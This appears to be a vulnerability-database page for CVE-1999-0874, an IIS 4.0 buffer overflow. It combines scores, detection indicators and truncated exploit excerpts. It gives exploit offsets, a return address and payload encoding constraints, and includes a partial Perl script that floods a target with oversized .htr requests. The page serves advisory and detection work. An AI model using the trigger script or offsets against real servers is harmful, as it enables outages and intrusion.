CVE-1999-0874
published 1999-06-16CVE-1999-0874: Buffer overflow in IIS 4.0 allows remote attackers to cause a denial of service via a malformed request for files with .HTR, .IDC, or .STM extensions.
PriorityP350critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
78.10%
99.5th percentile
Buffer overflow in IIS 4.0 allows remote attackers to cause a denial of service via a malformed request for files with .HTR, .IDC, or .STM extensions.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | — | — |
| microsoft | windows_nt | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP GET requests to IIS with extremely long path segments (>593 bytes) ending in .htr, .stm, or .idc — characteristic of the buffer overflow trigger. ↗
- →Alert on HTTP GET requests where the URI contains 593+ repeated characters followed by .htr — matches known exploit offset for NT4 SP3/SP4. ↗
- →Look for HTTP requests to .htr files with alphanumeric-only payloads of ~2048 bytes in the URI path — the Metasploit module uses alpha-numeric encoding with no NOP sled. ↗
- →Flag HTTP GET requests where the URI path length exceeds 2500 characters and ends with .htr — the Perl PoC iterates from 2500 to 3500 bytes. ↗
- →Detect the return address 0x77f8f0 (NTDLL.DLL jmp gadget) embedded at byte offset 598 within the HTTP request buffer — used by the Greg Hoglund exploit variant. ↗
- ·The exploit offset varies by NT4 service pack level: SP3 and SP4 use offset 593, SP5 uses offset 589. Return addresses also differ per SP. ↗
- ·Payload bad characters exclude all bytes outside alphanumeric range (0x00–0x2f, 0x3a–0x40, 0x5b–0x60, 0x7b–0xff) due to ISM.DLL input filtering. ↗
- ·Using EXITFUNC=seh allows the server to continue processing requests but causes issues terminating a bind shell; EXITFUNC=thread causes a server crash on bind shell exit. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
exploitdb·2010-04-30
CVE-1999-0874 Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit)
---
##
# $Id: ms02_018_htr.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS 4.0 .HTR Path Overflow',
'Description' => %q{
This exploits a buffer overflow in the ISAPI ISM.DLL used to
process HTR scripting in IIS 4.0. This module works against
Windows NT 4 Service Packs 3, 4, and 5. The server will
continue to process requests until the payload being
executed has exited. If you've set EXITFUNC to 'seh', the
server will continue
Exploit-DB
Microsoft IIS 4.0 - Remote Buffer Overflow (3)
exploitdb·1999-06-15
CVE-1999-0874 Microsoft IIS 4.0 - Remote Buffer Overflow (3)
Microsoft IIS 4.0 - Remote Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
/* iis 4.0 exploit
* by eeye security
*
* ported to unix/C by the teso crew.
*
* shoutouts to #hax and everyone else knowing us...
* you know who you are.
*
* gcc -
Exploit-DB
Microsoft IIS 4.0 - Remote Buffer Overflow (2)
exploitdb·1999-06-15
CVE-1999-0874 Microsoft IIS 4.0 - Remote Buffer Overflow (2)
Microsoft IIS 4.0 - Remote Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown
Exploit-DB
Microsoft IIS 4.0 - Remote Buffer Overflow (1)
exploitdb·1999-06-15
CVE-1999-0874 Microsoft IIS 4.0 - Remote Buffer Overflow (1)
Microsoft IIS 4.0 - Remote Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
Use the following script to test your site:
#!/usr/bin/perl
use LWP::Simple;
for ($i = 2500; $i <= 3500; $i++) {
warn "$i\n";
get "http://$ARGV[0]/".('a' x $i).".htr
Exploit-DB
Microsoft IIS 4.0 - Remote Buffer Overflow (4)
exploitdb·1999-06-15
CVE-1999-0874 Microsoft IIS 4.0 - Remote Buffer Overflow (4)
Microsoft IIS 4.0 - Remote Buffer Overflow (4)
---
// source: https://www.securityfocus.com/bid/307/info
Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine.
IIS supports a number of file extensions that require futher processing. When a request is made for one of these types of files a specific DLL processes it. A stack buffer overflow vulnerability exists in several of these DLL's while handling .HTR, .STM or .IDC extensions.
// IIS Injector for NT
// written by Greg Hoglund
// http://www.rootkit.com
//
// If you would like to deliver a payload, it must be stored in a binary file.
// Thi
Metasploit
MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
metasploit
MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.
No writeups or analysis indexed.
http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ234905http://www.ciac.org/ciac/bulletins/j-048.shtmlhttp://www.eeye.com/html/Research/Advisories/AD06081999.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-019https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A915http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ234905http://www.ciac.org/ciac/bulletins/j-048.shtmlhttp://www.eeye.com/html/Research/Advisories/AD06081999.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-019https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A915
1999-06-16
Published